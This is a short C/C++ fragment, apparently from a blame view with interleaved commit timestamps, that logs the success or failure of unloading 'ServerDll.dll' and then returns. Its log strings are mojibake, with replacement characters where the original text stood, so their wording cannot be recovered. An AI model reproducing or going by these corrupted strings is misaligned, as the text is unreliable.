Mprintf("<EFBFBD>ͷŶ<EFBFBD>̬<EFBFBD><EFBFBD><EFBFBD>ӿ<EFBFBD>\"ServerDll.dll\"ʧ<EFBFBD><EFBFBD>. <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>: %d\n", GetLastError());
|
2019-01-05 20:21:43 +08:00
|
|
|
|
}
|
2019-05-06 21:11:49 +08:00
|
|
|
|
else {
|
2025-02-07 19:23:15 +08:00
|
|
|
|
Mprintf("<EFBFBD>ͷŶ<EFBFBD>̬<EFBFBD><EFBFBD><EFBFBD>ӿ<EFBFBD>\"ServerDll.dll\"<EFBFBD>ɹ<EFBFBD>!\n");
|
2019-05-06 21:11:49 +08:00
|
|
|
|
}
|
2025-04-21 02:39:00 +08:00
|
|
|
|
delete runner;
|
2024-12-28 18:35:34 +08:00
|
|
|
|
return result;
|
2025-02-07 19:23:15 +08:00
|
|
|
|
}
|
